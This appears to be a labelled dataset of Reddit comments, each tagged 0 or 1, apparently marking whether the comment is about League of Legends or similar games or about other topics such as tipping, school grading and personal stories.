0	This whole debate pops up every other month or so on reddit, and for some reason it always makes it pretty far along toward the front page. Having spent the better part of a decade waiting tables in the United States, here are some realities I think the OP and a large portion of commenters aren't exactly comfortable facing, when it comes down to it:   1) The extremely shaky definition of "good" and "bad" service.   Did your waiter get everything right and provide you with refills, but just wasn't bubbly enough? Did they just not connect with you? Were they imposing on your private conversations? Every customer has a different expectation of what constitutes "good" service, and waiters aren't mind readers.   2) Very little of your experience is under the waiter's control.   Did your steak get overcooked? Did the manager refuse to take it off the ticket? Is it too hot or too cold for you to be comfortable? Is there really no gluten-free menu item for your spouse on a fad-diet? The waiter is only able to control the accuracy of your order and the speed of your drink refills. Pretty much everything else is outside their control.   3) Tipping is standardized and accepted practice in the United States.   Social customs and mores vary widely across cultures. If you live in or are visiting the United States, it is expected that you will tip your waiter in the 15-20% range, barring  extremely  bad service. This practice is so established in our society that we don't require waiters to be compensated with a minimum wage (more or less). If you feel that social customs and mores do not apply to you, because you have your own system of doing things, great. That makes you a sociopath (and also an asshole).   4) When you don't tip, or tip poorly, you're committing yourself to an extremely petty pyrrhic victory.   Do you like this restaurant? Do you  ever  want to go back? If you don't, no problem. But if you do, you  will  be remembered. A customer who leaves a shitty tip, or no tip at all, will  not  be forgotten by the waiter, and that waiter points out to other waiters that you're a bad tipper, and those waiters will generally treat you like shit.   Seriously... I can not emphasize this enough. You will never get good service at that restaurant again. It really doesn't matter whether it was justified or not, because waiters don't forgive that. And when you complain to a manager for that shitty service you're getting, they might apologize to you, but they already know you exist, and why you're being treated the way you are, and usually let it slide. Bad tippers are bad for business; as a manager, they piss off your wait staff and everybody suffers.   Look, basically, you guys can do whatever you want. I'd guess 90-95% of tables tip in the 15-20% range, and the 1-2% of shitty tippers are evened out by the 2-5% who tip over 25%, and it really doesn't mess up most waiters' nights. But it hurts emotionally, and you better believe they will remember you, and make sure you're known to other waiters, the managers, sometimes even the cooks. Is this whole circle-jerk over 5% of your meal really worth it?
1	doesnt proc on his q which is kinda his main dmg spell and its to expensive for only offensive stats. If you buy it early you are not tanky wich will set you behind. You also have to stack it wich costs alot of mana and Time   I personally started building  ICEBORN GAUNTLET  on olaf it gives you:     Armour for tankyness   Cdr for more Q´s and E´s which are basically his main dmg tools   Mana for more Q´s   You can basically get a Sheenproc on every or atleast every 2nd AA becase of your Q spam   AOE slow ontop of the shen proc     I personally build Glacial shroad -> Giantsbelt -> Iceborn. Im not the best olaf player but the iceborn helps me ALOT at sticking at the enemy carry.
1	Honestly I don't even like Monte but he has some valid points. He obviously was actually coaching, he was just a bad one. Anyone who belives Reginald is retarded, it doesn't even make sense from CLG's perspective. Why pay and associate a guy and let him leach glory and attention when he's not even helping? Monte benefited by being associated with CLG not the other way around...
1	I honestly don't run into these people that much. I think one person threatened to afk in my last 100 games and he just ended up playing cuz we won team fight as he said it lol. Idk if I have like positive rep so I only play with positive people or what but I just don't see these toxic people that often.
1	I'm hearing impaired, as well, and I gave up watching the LCS just before the playoffs of the Spring split started because it's not particularly enjoyable to watch the camera jump all over the map when you can't follow the flow of information that the casters are providing.   The thing is, Riot already had a reasonable option for remedying this, but the community completely destroyed it. The Twitch chat interface allows them to provide commentary through it and for a while in the Spring LCS, they were encouraging the pro players who had the day off to log into the stream's chat channel and provide some extra insight. This was fantastic for me, since one of the first times I noticed the pro players doing this is when NintendudeX was playing Leona as a jungler, which is something I had never seen before. The commentary from some of the pro players in the chat interface helped me understand why someone would choose to play her in that role, which I found quite interesting, since she's one of my favorite champions (although I play her strictly as a support).   The problem is, the community on Twitch is ridiculously toxic, which is to be expected when morons are provided anonymity behind which to spread their bile and it quickly lead to situations where the pro players simply weren't showing up anymore. There was one instance in which SK Ocelote was treated so horribly by the toxic community watching the LCS on Twitch that he just gave up and left, which left people like me high and dry on the commentary front. I felt so badly for Ocelote after that incident that I sent him a personal email thanking him for improving the quality of that match for me. I know he's mocked a lot for various reasons, but he's a great guy; he replied back saying that he was happy that his commentary was helpful to at least one person.   Now, I'm not naive enough to sit here and demand that Riot come up with a solution to our dilemma, since E-Sports are still a relatively new form of entertainment and Riot has gone above and beyond what I expect of most game companies in terms of making content accessible to the deaf and hard-of-hearing community as is. I still find it remarkable that they go out of their way to provide captions for every single video they release on Youtube, especially since they operate in an industry where even 5 years ago it wasn't uncommon to find games that didn't even include basic subtitles themselves. (Yes, I'm looking at you, Assassin's Creed.) Heck, we've only just reached the point where most commercials on television are captioned and we're still not to the point where we can reliably expect captions from streaming providers that provide content that is traditionally captioned in other formats, such as Netflix and Hulu.   Riot's commitment to accessibility gives me every reason to believe that we'll eventually see something from them on this front, especially since it would benefit those without hearing impairments when they're restricted to watching the matches without sound. I can patiently wait until that time comes, as I recognize that it's not a simple solution, but I do think they can do a better job of using the resources currently available to them to provide a sort of compromise here. Instituting subscriber/moderator-only chat on the LCS Twitch channels and providing commentary through there would be a fantastic start. We don't need a direct transcript of everything the casters are saying, but providing a less-hostile environment in which the other pro players can offer their own insights would be a great start.
1	Diamond here. It actually is an average play, the more impressive part is that he got that fed and farmed as Vayne that quickly. Just look at the champions.   1) Kassadin. Kassadin is a squishy AP Assassin out of position. 3 shot.   2) Brand is a squishy AP skillshot champion. Vayne used flash to get out of his combo. Now he's useless. 3 shot.   3) Janna's a low damage support. No hope against Vayne.   4) Varus is a squishy utility poke champion, and not a strong duelist especially when his cooldowns are down. Not to mention, he's far behind Vayne.
0	Well, ok. If you insist :)   One small note. Please don't take this as  the  definitive answer. For that you should go to the in depth explanation on the Danish Department of Education's home page, which is where I got my information a long time ago (combined with having been graded using this system).   Firstly you have a bunch of grades that are supposed to be used under normal circumstances: 6 - 7 - 8 - 9 - 10 - 11.   These are the ones supposed to represent the grades most people will get. People in a class are supposed to be graded on a curve and since most will fall at or around the middle (the grade 8), the scale needs to be a bit more fine grained here. Not everyone will be equally good at everything, so being a little better at one thing will equal being a little better at something else and your average grade will still be 8. As I stated before, 11 represent a complete and thoroughly comprehensive, correct answer.   The outliers are removed from the middle of the bell curve by quite a bit: 0 - 3 - 13. Let's start with the low scores.   0 is only supposed to be given to people who show absolutely no signs of understanding any of what the class had to offer. If you show in any way, that you have learned something relevant to the class, then you should not be given a 0 (the higher you get in the level of education, the more this absolute minimum gets). A 3 is given to people, who show severe deficiencies in their understanding of the material they are supposed to have learned - much more so than the "needs a lot/bit more work"-grades 6 &amp;amp; 7.   The reason why 0 and 3 are so far removed from the middle grades are that the grading system is developed for the Danish education system where (and please correct me if I mistakenly use the wrong terms here - not an expert on the American system) everything from kindergarten up to and including high school (if this is the step just before enrolling in a university) is meant partly as a way to... hmm, hard to explain... make you a whole person. By this I mean, that you are forced to take classes that are not your strongest side (like music, basic art, politics, religion and a couple of languages even though you might only really love physics and know you want to be a physicist). This is so that people get a full education making them more than just a one-trick pony and more of a fully functioning citizen.   Back to the explanation. If you get a 0 or a 3 it severely drags down your entire grade average and does so to indicate that this student has problems that needs to be addressed. This is to stop students from only focusing on the things they like and to strongly encourage them work on learning about the things that they also need to learn but might be harder for them or just interest them less. If you want a grade average worth anything, you will not want any 0's or 3's.   The 13 is meant only to be given for doing better than 100%. This grade was removed because very few in America understood this term so it unfairly put all Danish students, who wanted to study in the states, at a disadvantage. Americans only looked at "what is your country's top score" and did not understand that 11 was an A and 13 was "turning your hat in to a space canoe and paddling to the moon"-exceptional. So when trying to gain entry into american universities Danish students would have a very hard time for not having paddled to the moon enough times. So to speak.   In math/physics tests (and others like it) where you have a set of questions that can only be answered correctly or incorrectly, there will always be a bit more included than you are supposed to be able to answer. That way you can get a 13 even though you "only" answered everything correctly.   Small note: multiple choice is rarely to never used here. I have never encountered nor heard of people being given a test which included multiple choice parts for an exam.   13 is also not as far removed from the middle grades because being a wunderkind at speaking French and English doesn't mean that you get to ignore your math skills. Once you get to the university and choose what to study yourself, you are supposed to understand all aspects of the field you are studying and not just one part of it. Makes sense.
0	You're using legal jargon   Actually, I think you may have confused me (and numerous other redditors) with yourself there kid.  You seem to be the one posting over and over "But but but guys, I haven't broken the LAW so it's OK!"  While some redditors are arguing that you have broken some law (maybe not breaking and entering, but embezzlement etc), most are just of the opinion that you are a Grade 1 ass hole, and have so far demonstrated that you are morally bankrupt.
0	My GPA is good, too (but I'm writing this instead of studying for an impending exam so maybe not for long), my best friend from high school has decided to become a pervert (so we've fallen out of contact), my other friends from high school are in a university in another city, the only person I made a meaningful connection with in first year has a crippling League of Legends addiction that prevents me from ever talking to/hanging out with him, and I haven't really gelled with anyone else. I blame being a non-drinker in a de facto relationship who isn't living on a college compounded with a complete lack of interest in any of the clubs/societies on campus as well as my personality and niche interests being incompatible with my peers, but it's actually social anxiety reinforced by past failures preventing me from bothering with meaningful friendships.
1	She appears to be a very good pubstomper. She's an Akali with insane jungle clear and better CC. Late game, you can only really expect her to dive in and hopefully burst 1 person down before dieing (Unless Diana is really fed, then can do more.)   Still though, outside of Solo queue I don't expect to see her much. There just isn't room for squishy melees in the current tournament meta. Most Junglers run tank or support. Assassins are pretty rare especially when you have tanky ones such as Irelia which can dive a ADC just as well.   She doesn't appear to be as good as a bruiser as people expected. Her mid is good, but again she is melee and against competent AP carries she might struggle without getting help early. Her jungling is where she shines IMO. Her W is enough to sustain through the jungle and clear fast. Not very blue buff dependent unless you're constantly ganking and spamming all your spells. After 6 her ganks are pretty good. R in to gap close, W, then E them into your W and then Q. That is a lot of burst and if you hit your E it will CC them for a split second or two giving your lane time to join the gank.   I feel she just falls off late if not fed. Similar to a Lee Sin. She becomes insanely squishy and has to literally dive into the enemy team to do damage. Those types of champions usually struggle. If built straight AP, I guess her Q would be enough poke damage. Still don't like relying on a skillshot as you're only source of damage (that doesn't put you in the middle of their whole team ie. her R,W,E). Especially since her skillshot has a long travel time.
0	If your 16 year old daughter gets knocked up, it's pretty much on the girls parents to salvage the situation. It is their household that will have to change  to receive a newborn baby. The girls parents are the ones who will be awake all night with a crying sick infant, it is the girls parents who will absorb most of the financial burden of the baby. How is the girl going to stay in school and then go to collage? The girl is 16 and already has a kid, that means she is 16 and already has baggage. Alot of guys (including me) won't date Women with kids (wayyyy too much trouble). Now, if a 16 year old boy gets a girl pregnant, he has to get a job and maybe spend a few weekends dealing with the kid.
0	WTF do you think "write off" means?  Fine, he gets to reduce the expense to 75% (with a 25% marginal tax rate, after all other deductions), that's still paying 75% out of potential profit
1	The short version is:   Cleaver fits a champion that deals the majority of their damage from their Abilities while Youmuu's fits a champion that deals the majority of their damage from their Basic Attack.   Alternatively:   If the best way to use your champion's Basic Attack is to use it about once in between using Abilities, Black Cleaver is probably for you: Pantheon, Riven, Kha'Zix, Talon etc.   If on the other hand your champion uses their Abilities to position and then the best way to use your Basic Attack is to repeatedly whack your opponent over the head with it, then Youmuu's is probably for you: Jarvan, Nocturne, Xin Zhao, Tryndamere etc.
0	I believe this philosophy whole-heartedly....however I still can't enforce it...I feel like I'm abusing my child if I don't give him food.....it sucks.
0	I'm going to explain this to you one time and one time only.   I am replying to the claims that you can only defend yourself to the deal if you fear for your life or imminent threat as if those claims are true because I am fucking lazy.   a) You can't tell me when I should fear for my life and I am positive I could convince a jury if needed. Hypothetically.   b) It doesn't fucking matter because that premise is wrong in the first God damned place.   >“An illegal arrest is an assault and battery. The person so attempted to be restrained of his liberty has the same right to use force in defending himself as he would in repelling any other assault and battery.” (State v. Robinson, 145 ME. 77, 72 ATL. 260).
1	Wasn't even that. They got outplayed in every lane. They won every lane if not went even. You can't do that against a jax, and Bengi had a lot better ganks. Also poo and piglet dominated bot lane every 2v2 they had.  edit
1	IMO the item actives/unique passives are what make itemization in Dota so flexible from game to game. When the focus of items is on stats, choosing what items to build is mainly a game of optimization, and that doesn't change much from game to game. Sure, you may alter your build path to include more armor or magic resistance based on your needs, but in practice each champion or even entire classes of champions are most successful sticking to a handful of core builds.   With actives like hex (Scythe of Vyse), silence + damage amplification (Orchid Malevolence), mobility (Blink Dagger, Force Staff), and magic immunity (Black King Bar), as well as passives like evasion, true strike, bash, and critical strike, optimization becomes a lot more complicated. Actives can almost be thought of as extra hero abilities (and in fact many items have similar but more powerful equivalents on certain heroes), and just like there isn't a single best champion to choose every game regardless of the enemy (or at least there shouldn't be if Riot hasn't screwed up the balance), the best item actives depends a lot on the specific game. Not only is it dependent on how well you actually use the active (even the best active is useless if you never use it), but certain items and hero abilities counter others, making them stronger or weaker depending on your specific needs.   While in League offensive itemization largely boils down to maxing AD and AP to maximize the power of your abilities (this of course being an oversimplification), in Dota even a task as simple as maximizing your autoattack damage can be highly situational. The most obvious example perhaps is that of Daedalus vs. Monkey King Bar (MKB). Daedalus gives a crit chance and a bunch of damage, while MKB gives slightly more damage and a bit of attack speed, gives a chance to deal a bit of extra flat damage and a ministun, and gives true strike (your attacks never miss). Since Daedalus gives a crit, it's more effective the more damage you have, unlike the static extra damage you have a chance to deal with MKB, and it turns out that in terms of raw DPS Daedalus is almost always more effective than MKB. This, however, all changes when you factor in evasion and blinds. Even if you get a massive 2k+ damage crit, if the attack misses it's not going to do anything. On the other hand, true strike means that evasion and blinds are completely useless if you're holding an MKB, so with this in mind, if the enemy has built a Butterfly or Heaven's Halberd (evasion items) or has an evasion hero ability like Phantom Assassin's Blur (50% evasion chance when maxed!), you're going to need an MKB even if it isn't normally the item you would go for. Also, Daedalus isn't even the best damage item on every carry - the slightly higher damage stat on MKB is useful for a hero like Gyrocopter, whose primary carry ability, Flak Cannon, can't crit even with a Daedalus, making the crit stat next to useless.   Other interactions like this exist in item pairs like Orchid and Manta Style (Orchid's silence active becomes far less impactful if the enemy has a Manta to purge the silence off), and Blade Mail and BKB (the damage return active of Blade Mail is nullified by BKB's magic immunity). This, however, doesn't take into account the variation that comes from actually using these actives. For example, Scythe of Vyse's hex is blocked by magic immunity, but if you hex someone before they activate their magic immunity, they can't activate it while they're hexed, so even though it may look like a BKB can counter sheepstick (Scythe of Vyse), it can actually be the other way around if the sheepstick carrier has good initiation. As I said earlier, BKB blocks Blade Mail damage when activated, but if BKB is on cooldown this doesn't apply, and you could even use Blade Mail to force the enemy to pop their BKB to avoid killing themselves from the return damage, which can then turn the fight in your favor when the magic immunity runs out. It's all dependent on how you use the items, which you don't really get from stats-focused items - 50 AP is always going to increase the damage of a certain champion's abilities by the same amount.   Lastly, unique item abilities can situationally be used to fill in gaps in your team's composition. Items that would make no sense in any other situation can be picked up because your team really needs it. Sheepstick (hex) is a key example of this - if your team lacks hard disables, a sheepstick may be the best item to get in this game even if the stats have no synergy with your hero at all. This also has the added advantage that heroes don't need to be designed to have all their requirements to be successful in their basic abilities, which leads to greater freedom and variety in designing heroes. Melee hero with no mobility spell? Initiator with no way to dive into the enemy team? No problem if you get a blink dagger. No disables to stop an enemy from simply teleporting away from you? You can buy a disable for yourself. But you don't always  have  to - sometimes your team can supply the disables that you lack, and with Force Staff they can even give you a certain degree of mobility if you lack that.   So
1	True, but most of their comfort picks started to change a lot, Seraphs Shyvanna was no longer part of the meta, Lee would be banned or taken away from Dexter, Link couldn't be the farm heavy support style mid laner he wanted be to be with more Assassins starting to come into power, DL was never the best Tris or Kog and was better with champs like Vayne (which with her kiting potential, his spilt push adc plan actually works), and with other teams improving their shotcalling while CLG has no real impact full.
1	Just for the record. Last hitting is one of the most important mechanics in the game. With last hitting, you are able to get the gold from a single minion and still have the minions fighting each other. By doing this you do not push your minions too far towards your enemies' tower/turret (or whatever you like to refer it to). The benefit of this is that you will be closer to your own turret and avoid many ganks. Also, if your enemy does not know how to last hit and decides to auto attack your minions, they automatically push towards your tower, enabling your team to gank your lane.   Even if you do not get kills during lane phase of the game (most likely the first 7-10 minutes of the game), by last hitting successfully, you are able to maintain a good creep score(minion kills) and get a lot of gold. You will find that purchasing any equipment that you think is compatible with your champion a lot easier this way.   Usually,the more creep score(cs for short) you have, the greater advantage you have over players with less. Of course, this is disregarding kills, deaths, and assists, and only regarding last hitting for gold in order to purchase items quicker in the game.   [
0	Can someone summarize why Morgan Freemans AMA sucked?   [The over-obvious
1	This is the reason, the Ap gained by Viegers Q directly effects his AP stat on his character which effects all his damaging abilities at once as well as things like lichbane, nashors tooth, and spellsword. If you REALLY wanted to know how much AP he is getting from his ability, you could just do the maths with items etc, but that doesnt really matter because nothing will make him lose AP so you just need to know how much he has in total.   Nasus on the other hand could deal a phenominal amount of damage off 1 Q, even if his build is pure tank. Because the damage is so influential and key to his play, they needed to display it as a stat somehow with the buff indicator.
0	This isn't exactly about buying anything embarrassing. Anyway though, a while back when I had just received my license I would stop at a gas station every morning before school to get coffee. I never really talked to the cashiers or any of the employees but they were used to me and knew my face and all. Well, one morning I was running behind and I was still very tired. Instead of just going on to school and skipping the coffee like I should have I rushed to get the coffee. I arrived at the gas station and quickly pulled into parking spot next to a car. When I did though I scraped the side of the car on my right. Well, here's mistake number 2. I fucking panicked and ran inside and got my coffee and then went to school. I didn't say anything to anyone about it and didn't ask anyone who owned the car; I just left. It didn't do much damage to my car so it wasn't that noticeable to anyone. I live in a small town and most everyone knows me and knows my car due to it being such a unique color (grabber blue). So when the owner of the car saw the blue streak I left down the side of her car she called the police and reported a hit and run. She didn't know my car though, but the police did because I was dating a girl whose mother worked at the police station at the time and I frequented the police station due to that. Well, that day at school they were supposed to be calling guys to the office to check people's cell phones because there was some vulgar picture of an underaged girl going around at the time (I had never seen it but I was expecting to be called anyway). Well they call me to the office and there's a police officer waiting on me. I go in and sit down and he asked me if we could go take a look at my car. At that moment I shit myself. I knew he knew. I went out to my car and I admitted what I had done. He arrested me even though he didn't want to and took me to that gas station. Turns out the woman who owned the car was the district manager for the gas station. I had to talk to the woman and every employee in there was looking at me. I apologized and explained everything to her. She was pretty mad but agreed not to press charges if I paid for the damages. I arrived back at school and everyone already knew I had been arrested because some girl who's dad is a cop got to school late and told everyone she heard my name over the scanner. People were astonished because I had never even come close to breaking the law before. It was the most embarrassing day of my life and I am still too embarrassed to go that gas station and buy anything again. Because, yes, they do remember and care.
1	That's... too long.   Jax
0	What does
1	He doesn't fit into current meta for 5v5. But he is terrifying in 3v3. Grab health regen pendent (part of warmogs), then zerkers grieves. Rush that warmogs. Then grab atma's, spirit visage, FoN/ thornmail (depending on the team), and if you haven't terrified the enemy team into surrender build another warmog.   Have a ton of health (to counter tons of damage) and heal it up all the time. Just be sure to land those cleavers and don't grab burning agony until you have decent health regen so it won't drain you (usually level 8).
0	OMG, yes! I accidentally sent a ton of LinkedIn requests to all suggested contacts while my phone was face- down on my leg. I didn't even know it happened until I kept getting random messages "XXXX has accepted your request"!!!!
0	No, because if it was a guy, sure you'd never know, but he would. He'd know forever, and would always carry the knowledge that you were at his mercy, that  he  was the one that got you off and there's  nothing  you can do to ever change that.
1	The more trolls you have at your Elo the more you'll win.  Assuming that you never leave the other team will have more AFKers than you as they have 5 possible leavers while you only have 4.  This maths works for any value of  x  but let's assume you have a leaver or troll on your team once every 4 games. You will have an AFK player on the other team once every 3.2 games compared to your 4 games. Therefore over the long term you will be gaining Elo from people being AFK.   Maths:     x  = Chance of a player leaving = 1/16 (If you have 1 AFK in 4 games this means that one of the 16 people you played with is an AFKer. 16 because out of the 40 players in 4 games 20 are on the opposing team and 4 of them are you. 40-20-4=16)     You:  4 x  = 25%     Them: 5 x  = 31.25%     They therefore have more AFKers than you.       Or put another way assuming a 50% win rate in any fair games without trolls:     0.25 = AFK Loss   0.3125 = AFK Win   1-0.25-0.3125 = Normal Game = 0.4375  Therefore     Win = 0.4375/2 + 0.3125 = 0.53125   Loss = 0.4375/2 + 0.25 = 0.46875  So if he wins 50% of the fair games he will gain Elo due to having an actual win percentage of  53.13% .
0	You're using your religion as a scapegoat, even though your religious standpoint doesn't even  apply  here.   Pretty sure that just makes you an asshole. Your god wouldn't approve of the fact that you're using him as an excuse of your doucheyness.   You want to make this about religion? Too fucking bad. It doesn't apply, and that's not why we downvote your shitty comments. We downvote them because of how much you're being an asshole.
0	I took some...substances... last night and watched some MMA. I couldn't look away for some reason. I kept wondering (probably out loud) to myself why anyone would willingly stand toe to toe with a guy like Wanderli Silva. It looks so brutal. But then it started to seem like some weird dance. These guys were having a great time getting the shit kicked out of them. Those 5 minute rounds seemed like hours. I realized when the bell finally rang I was gripping my chair so hard my fingers were locked up.
1	so heimer with the lowest base movement speed of ALL champs can outrun a karthus with wall of pain? um. no.   lets weigh it out.   your setup:  4,5% movespeed (quints), so 313 mspeed total.  15 ap , a little mana reg, 80 hp (dorans)  no pots   vs   350 movespeed  (boots)  15 ap (quints)  no mana regen  450 hp in pots   so basically what you are saying is:   "i pick the same offensive stats, just less defense and less movespeed.  and no ignite. "  so i cant ever kill anyone and can never get away from ganks. also i cant ever recover from trades and die as soon as i get poked repeatedly.   also this post is gonna get downvoted for telling the truth.
0	It's hard to tell the difference between someone being naive, and someone being manipulative.   In every relationship both parties want something from the other. No exceptions. It can be good, and it can be bad; but I would say the most important part is being honest about it.   For instance, alot of people would deny judging others on appearances, but it is the first thing we all do. It may be their actual body, how they dress, how they carry themselves, or more likely a combination of all three. Then we make assumptions about each other: are they nice, honest, and what do they want from me. Then we communicate by trying to figure out what the other person thinks you are thinking. Alot of people fuck up here since they only have one reference (themselves).  From there it goes all directions of crazy.   I live in a cold world full of beauty...   In my own relationships I just try to be honest to myself about the assumptions I make, and honest to others about my intentions. Like if I see a beautiful girl doing something i enjoy also I just say, "Hi. You're very beautiful and I too enjoy  __ . I would like for us to get to know each other," and I've had more than one laugh and say that had a boyfriend. Which is all cool, because then we all know where each other stand and can get on doing the activities we enjoy. As for jealous boyfriends: that's a personal issue for them and is usually cleared up over a brew.   An interesting book on these topics is  The Four Loves  by C. S. Lewis. Yes, he is theologian and the book comes from a christian perspective, it has alot of sound concepts and I would encourage you to have an open mind. Ironically, C. S. Lewis is what made me question my own religious raising and cast aside theism. Religion is just stories stolen from poets. Now I am rambling...
1	Why is she strong in competitive play?   Her base kit has the following features:     manaless;(strong laning phase)   passive gives armor and magic resist;(scales well with levels)   basic attack reset;   a double on-hit effect apply, so you can clear wards in 2 shots or apply 2 hits of botrk;   bonus movement speed;   aoe DoT arround you that does magic damage and scales fully with AD;   ranged FREE(no mana) poke/last hit tool with magic damage;   bonus damage on hit equal to enemy %total health;   ULT is a ranged jump that knocks enemies back, does magic damage, doubles the resists from passive,  AND makes ALL her skills become aoe ("but the w was already AoE!" you will say, don't worry, now it leaves burning trails behind so you can apply it to a larger area! did i mention is magic damage that scales with ad?);     To add to those, her q cooldown shortens with basic attacks by 1 second, her w increases in duration from 3 up to 7 with basics attacks and her ult can be increased in duration through basic attacks.
1	This would make League into a place full of love <3   I believe this would make the overall ranked experience way better, for everyone. Why do i think so, ok let me elaborate.   There is a LOT of different people that plays this game. And there is a lot of different reasons to why we play ranked. But I am going to describe the type of person that i feel makes the ranked experience really unpleasant at times.   Mr.elo: He wants to climb, he wants to win. He puts a lot of effort into his games, he takes them very seriously. He get´s really frustrated when people make mistakes, sometimes he gets so frustrated that he takes his frustration out on his teammates.   I am getting to my point now soon, bare with be :D This is taken from the Tribunal. "When a summoner's case receives a certain number of "punish" votes (a number not divulged by Riot), they receive a punishment intending to deter this behavior from happening again. Possible punishments include a warning, suspension, name change, or in severe cases, permanent banning.   Yes people get punished, the ones with the worst behavior does. But a lot of us don’t. We say stupid shit without even thinking about it. I believe if this system was implemented, it would encourage us to be nicer, yes. But most importantly it would encourage us to NOT say mean shit.   I would like to go more in depth in this post, but it would get way to long and there is a lot of people that would not read it, therefore i tried to keep it as short as possible while trying to explain my thoughts on this matter. I really hope riot will look into this!   Sorry for the long post and any grammar fails :) I really hope riot will look into this!
0	Reddit complains about girls not giving it up but also loves this kind of dumb sexist shit? It's sex, we should all be doing it all the time and should take it so seriously. We need to be better educated about doing it safely, then do it as much or little as we want. When did this become a puritanical paternal hierarchy?
1	auto, q, click away, put mouse on target, q, click away, put mouse on target, auto, etc.   If you are getting kited, instead of putting mouse on target, click behind target so you get the full dash from q not a stopped dash.   When I was first learning, the problem was that I wouldn't have my mouse on the target when I was qing and moved it to click away too fast.  Try it on wraith camp, if you jump around a lot, this is likely the problem.  Its a little complicated to explain and requires a lot of practice to be able to do under pressure.  GL
0	Well when I was little, we could kinda go in and do whatever we wanted for a little. Then we might get a lessons or something and then go back to doing whatever we wanted. It was kinda like pre-k but all the time. So I did whatever I liked. In Pre-K-Kindergarten I would just do map puzzles all day. Then in 1st-3rd grade I would read, do math, and memorize flag pictures. Then in 4th - 6th grade I would straight up do math all the time. I would also get a compass and just draw a fuck ton of circles and make designs out of them.   It was a weird structure. I think it was good in some ways, it made me really excited about math and geography but in other areas I was seriously lacking. I had no idea about sentence structure i.e. verbs, predicates, whatever. I still have no clue about grammar. I also couldn't really write coherently because I never learned how.   To put it in perspective; my older brother (4 years older) who was montessori schooled was able to read before my oldest brother (6 years older) who in a conventional school.
1	I've being trying both EWQ and EQW for a series of games, and I feel maxing Q second is much more beneficial. Of course, W makes you fast and fun, but maxing it is only good for passive, as you won't to be spamming it as long as you want to be able to keep up. And the reduced cooldown on Q with an ability to cast an extra tornado every two ones is extremely crucial. Ever had that creepy feeling when some Warwick ults your ally, and your Q is on cooldown for some reason?
0	We have quite a few near where I live in Oklahoma. It's not quite Amish. They have cars and some modern stuff. I'm fairly sure they're not allowed to have TV for entertainment because we had someone light a hay barn on fire and a bunch of Mennonite vans came and just sat on the side of the road and watched us and the firemen deal with it. They dress conservative. Dresses and the bonnet type thing over their buns and suspender flat brimmed straw hats for the men and boys. We had an Mennonite mechanic and his wife wasn't allowed to answer their phone or talk to us. Their kids go to school till grade 10 or so. And one Mennonite dude was told by the church to go on a missions trip and find a wife so he went to Haiti or Jamaica and brought back a very black lady for his wife so I guess that's a thing Mennonites do..
0	Story : He had a huge crush for this girl since 6th grade. He would always talk about her and if we ever joked or mentioned her at all he would get all defensive. We would always encouraged him to make a move but he always shied away. This went on all through high school, in senior year all his friends had dates for prom and he decided to ask her. She said yes almost automatically and told him what color she wanted him to wear so they could match. He was the happiest man that week, wouldnt stop talking about prom. He rented the most expensive tuxedo out of all of us and bough a beautiful corsage, he really wanted to make an impression. Prom day came and we were all suppose to carpool together. once we went to pick him up he wouldn't answer his phone, texts or his door. He tried everything for almost an hour, we even tried knocking on his room window and nothing. we assumed he got cold feet and we left to meet with the girls. we told them what had happened so they immediately found a replacement. He finally woke up and called us telling us what had happened. Apparently he decided to take a nap, not in his room but his parents room (on the other side of the house) that had a Tempur-Pedic bed, he forgot his phone was on silent and his parent went out to eat. He had no ride and even if he did he had already been replaced. His crush and his replacement hit it off so well they dated for 4 years and are now engaged.
1	Thank you Tryndamere and thank you Ryze for creating what is now such an amazing social phenomenon, I'm talking about League of Legends for sure.   By thanking both of you, I thank also all the different employees in Riot, from the Community Manager, to the live broadcast crews, via the game designers, and everybody else inside or outside Riot who is involved in making LoL both game and eSport such a great and amazing success.   I hope you guys will finally lead to recognition what really eSport and gaming truely mean and how much that can be a great factor of development and integration.   Now, I'm gonna ask my question : recently, I've heard and read a lot of criticism about sexism in LoL as a game ( things like what is shown here  and as an eSport ( things like what is shown here . Girls complain about how all female champions look so outrageously gorgeous and even guys complain about how perfect is male champions' body. It's not a general opinion, but there is more and more people that adhere to their view about sexism in league, at less they take their affirmations a bit seriously. Also, female LoL players complain about why they cannot begin a pro career in LoL eSports (it's not only the case of LoL though).   For the first point, I'm a guy and I love the models design and splash arts of all the attractive female champions in LoL, and I do prefer the sexy character designs/suits/poses of some Ahri, Katarina, Sona, Ashe (sorry for that :p), Janna, Miss Fortune, and Syndra, rather than some less attractive designs/suits/poses of some Poppy, Tristana, Vayne. About "discrimination" in eSports scene towards female LoL players, I might have some ideas about the reasons of why there is no female pro players in LoL, but my english is not good enough to explain clearly what lies in my mind (if I can say it like that). \^\^' However, the way you handle this problematic could even reach a sociopolitical dimension - or I'm just talking shit...   So,
0	It is the only way i know how to communicate without sounding like a dullard
0	Me and my best friend do this to eachother so many times, its quite funny too cause we can tell when eachother are doing it. Also, i did this to a little kid once and she just looked at me with the most puzzled look cause she asked me a question haha.
1	You are implying said people are playing to win, and in the end league of legends is a game and people can enjoy it how they so wish. Problem with LoL is there really isn't a "let's just fuck around queue' other than Arams(?) so these people who want to play the game in a different way will end up against players who are taking it seriously or playing the 'objective'.   Take Call of Duty for example. A game type like domination, I have no interest in capping any kind of flag, I just want to kill people for a bit, the end result I care little. Maybe that will help you to realise the mindset here.   (I'm not saying it's right or wrong, that isn't my concern)
0	The only way this would have been possible is if your girlfriend stepped into a crack in time in which time is slowed down immensely.  This same concept has been compared to such topics as Santa Claus and him being able to reach billions of individuals in a short amount of time.
1	dat troll
0	Almost literally all of that was bullshit.   First, most people have dynamic public facing IPs, and second, virtually no routers are so fundamentally insecure as to show the local address to remote hosts.   I'm going to explain for you;   You have the local address, which is always IPv4. Most routers that aren't using isolation assign addresses in the 192.168.1 block unless specifically configured otherwise. The four numbers seperated by dots each go up to 255, because each of them is a 1 byte number, with 1 byte having 256 possible values. So if your IP is 192.168.1.4, the router understands this as 0b11000000-0b10101000-0b00000001-0b00000100. The lowest value is typically reserved for the router, i.e. 0b11000000-0b10101000-0b00000001-0b00000001.   Second, the fact that the router has the mac address of your computer is  the very reason why  you don't need to have a public IP for each device. This is why DHCP was invented, so that the router (so called because it routes all the data) could receive packets and route them to the correct machine.   Also, MAC address spoofing is not in any way illegal, so I have no idea where you got that from.   And, HTTP header packets contain neither the computers local address, nor it's mac address. If you'd ever used a packet sniffer you would know that. Take a look at [this packet]( it contains routing information,  then  the data to be routed, i.e. the header information and HTTP request. The local address and MAC are never sent to the external server. Even a novice coder, like a web designer, would know that much.   Another thing, you're wrong about how upvotes work too. You can absoutely upvote something from the same IP address, I've upvoted my friends' comments many a time while we were using the same router. A look at [how reddit filters upvotes]( completely disproves that point.
